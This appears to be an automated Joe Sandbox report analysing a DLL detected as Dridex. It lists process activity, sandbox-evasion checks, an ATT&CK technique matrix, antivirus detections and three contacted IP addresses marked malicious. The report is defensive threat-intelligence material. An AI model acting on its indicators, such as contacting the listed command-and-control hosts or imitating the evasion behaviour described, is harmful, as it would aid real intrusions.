                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000F6CC push esi; mov dword ptr [esp], 00000000h3_2_1000F6CD
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.5511794748
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Tries to detect sandboxes / dynamic malware analysis system (file name check)Show sources
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\Testapp.EXEJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: \KnownDlls32\Testapp.EXEJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: \KnownDlls32\Testapp.EXEJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: \KnownDlls32\Testapp.EXEJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: \KnownDlls32\Testapp.EXEJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: \KnownDlls32\Testapp.EXEJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: \KnownDlls32\Testapp.EXEJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: \KnownDlls32\Testapp.EXEJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
                      Source: WerFault.exe, 00000009.00000002.590600572.0000000004D60000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.576175012.0000000004AA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.652189195.0000000004C80000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.655711395.0000000005180000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.653365977.00000000049D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: WerFault.exe, 0000001B.00000003.640882384.0000000004C76000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
                      Source: WerFault.exe, 00000009.00000002.590399877.0000000004B42000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.649430287.0000000002E5D000.00000004.00000020.sdmp, WerFault.exe, 0000001C.00000002.652211709.0000000003350000.00000004.00000020.sdmp, WerFault.exe, 0000001E.00000002.653157247.00000000047BF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 00000009.00000002.590600572.0000000004D60000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.576175012.0000000004AA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.652189195.0000000004C80000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.655711395.0000000005180000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.653365977.00000000049D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: WerFault.exe, 00000009.00000002.590600572.0000000004D60000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.576175012.0000000004AA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.652189195.0000000004C80000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.655711395.0000000005180000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.653365977.00000000049D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: WerFault.exe, 0000001B.00000003.645667418.0000000004C76000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0w
                      Source: WerFault.exe, 00000009.00000002.590600572.0000000004D60000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.576175012.0000000004AA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.652189195.0000000004C80000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.655711395.0000000005180000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.653365977.00000000049D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,3_2_10006D50
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,3_2_10006D50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,3_2_10006D50

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Virtualization/Sandbox Evasion11OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection11LSASS MemorySecurity Software Discovery111Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerVirtualization/Sandbox Evasion11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll321NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing3LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 404285 Sample: 3c271eae_by_Libranalysis.dll Startdate: 04/05/2021 Architecture: WINDOWS Score: 76 34 95.138.161.226 RACKSPACE-LONGB United Kingdom 2->34 36 167.114.113.13 OVHFR Canada 2->36 38 193.200.130.181 CLOUD-MANAGEMENT-LLCUS unknown 2->38 40 Found malware configuration 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected Dridex unpacked file 2->44 46 2 other signatures 2->46 9 loaddll32.exe 1 2->9         started        signatures3 process4 signatures5 50 Tries to detect sandboxes / dynamic malware analysis system (file name check) 9->50 12 cmd.exe 1 9->12         started        14 rundll32.exe 9->14         started        17 rundll32.exe 9->17         started        19 4 other processes 9->19 process6 signatures7 21 rundll32.exe 12->21         started        52 Tries to detect sandboxes / dynamic malware analysis system (file name check) 14->52 24 WerFault.exe 9 14->24         started        26 WerFault.exe 2 9 17->26         started        28 WerFault.exe 9 19->28         started        30 WerFault.exe 9 19->30         started        process8 signatures9 48 Tries to detect sandboxes / dynamic malware analysis system (file name check) 21->48 32 WerFault.exe 23 9 21->32         started        process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      3c271eae_by_Libranalysis.dll21%MetadefenderBrowse
                      3c271eae_by_Libranalysis.dll28%ReversingLabsWin32.Trojan.Wacatac
                      3c271eae_by_Libranalysis.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      17.2.rundll32.exe.7b0000.2.unpack100%AviraTR/ATRAPS.Gen2Download File
                      2.2.rundll32.exe.2fa0607.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.rundll32.exe.560000.2.unpack100%AviraTR/ATRAPS.Gen2Download File
                      0.2.loaddll32.exe.b40000.1.unpack100%AviraTR/ATRAPS.Gen2Download File
                      3.2.rundll32.exe.830607.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.rundll32.exe.790607.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.loaddll32.exe.a40607.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.rundll32.exe.9e0000.2.unpack100%AviraTR/ATRAPS.Gen2Download File
                      13.2.rundll32.exe.bb0607.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.rundll32.exe.540607.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.rundll32.exe.d70607.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.850000.2.unpack100%AviraTR/ATRAPS.Gen2Download File
                      18.2.rundll32.exe.d90000.2.unpack100%AviraTR/ATRAPS.Gen2Download File
                      13.2.rundll32.exe.b90000.1.unpack100%AviraTR/ATRAPS.Gen2Download File
                      16.2.rundll32.exe.9b0607.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.rundll32.exe.2fc0000.2.unpack100%AviraTR/ATRAPS.Gen2Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.micro0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://crl.micro80%Avira URL Cloudsafe
                      http://crl.microH0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.microWerFault.exe, 0000001C.00000003.648753130.0000000005092000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://crl.micro8WerFault.exe, 0000001B.00000003.645645354.0000000004C20000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.microHWerFault.exe, 0000001E.00000003.646412621.0000000002A79000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      167.114.113.13
                      		unknownCanada
                      		16276OVHFRtrue
                      95.138.161.226
                      		unknownUnited Kingdom
                      		15395RACKSPACE-LONGBtrue
                      193.200.130.181
                      		unknownunknown
                      		42960CLOUD-MANAGEMENT-LLCUStrue

                      General Information

                      Joe Sandbox Version:32.0.0 Black Diamond
                      Analysis ID:404285
                      Start date:04.05.2021
                      Start time:21:43:32
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 11s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:3c271eae_by_Libranalysis.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:40
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal76.troj.evad.winDLL@22/20@0/3
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 99.1% (good quality ratio 91.7%)
                      • Quality average: 74.8%
                      • Quality standard deviation: 31.3%
                      HCA Information:
                      • Successful, ratio: 68%
                      • Number of executed functions: 11
                      • Number of non-executed functions: 8
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                      • Found application associated with file extension: .dll
                      Warnings:
                      Show All
                      • Excluded IPs from analysis (whitelisted): 104.43.193.48, 184.87.213.153, 13.64.90.137, 93.184.221.240, 52.255.188.83, 40.88.32.150, 40.126.31.5, 20.190.159.131, 40.126.31.9, 20.190.159.133, 40.126.31.138, 40.126.31.3, 40.126.31.7, 40.126.31.142, 20.82.209.104, 8.248.149.254, 67.27.158.254, 67.26.139.254, 67.27.159.126, 67.26.137.254, 23.57.80.111, 52.147.198.201, 40.126.31.137, 40.126.31.8, 40.126.31.139, 20.190.159.138, 40.126.31.1, 20.190.159.132, 40.126.31.4, 20.190.159.134, 92.122.213.247, 92.122.213.194, 20.82.210.154, 104.43.139.144, 52.155.217.156, 20.54.26.129
                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, login.live.com, cs11.wpc.v0cdn.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                      • Report size exceeded maximum capacity and may have missing behavior information.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      167.114.113.13fc0bc077_by_Libranalysis.dllGet hashmaliciousBrowse
                        e1c88b94_by_Libranalysis.dllGet hashmaliciousBrowse
                          577e66d4_by_Libranalysis.dllGet hashmaliciousBrowse
                            b8fe43e6_by_Libranalysis.dllGet hashmaliciousBrowse
                              f845ef61_by_Libranalysis.dllGet hashmaliciousBrowse
                                3c271eae_by_Libranalysis.dllGet hashmaliciousBrowse
                                  fc0bc077_by_Libranalysis.dllGet hashmaliciousBrowse
                                    e1c88b94_by_Libranalysis.dllGet hashmaliciousBrowse
                                      8743016c_by_Libranalysis.dllGet hashmaliciousBrowse
                                        d8417415_by_Libranalysis.dllGet hashmaliciousBrowse
                                          9a46403f_by_Libranalysis.dllGet hashmaliciousBrowse
                                            edae86a8_by_Libranalysis.dllGet hashmaliciousBrowse
                                              457aedfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                64b8ed95_by_Libranalysis.dllGet hashmaliciousBrowse
                                                  8743016c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    d8417415_by_Libranalysis.dllGet hashmaliciousBrowse
                                                      c977c96e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                        9a46403f_by_Libranalysis.dllGet hashmaliciousBrowse
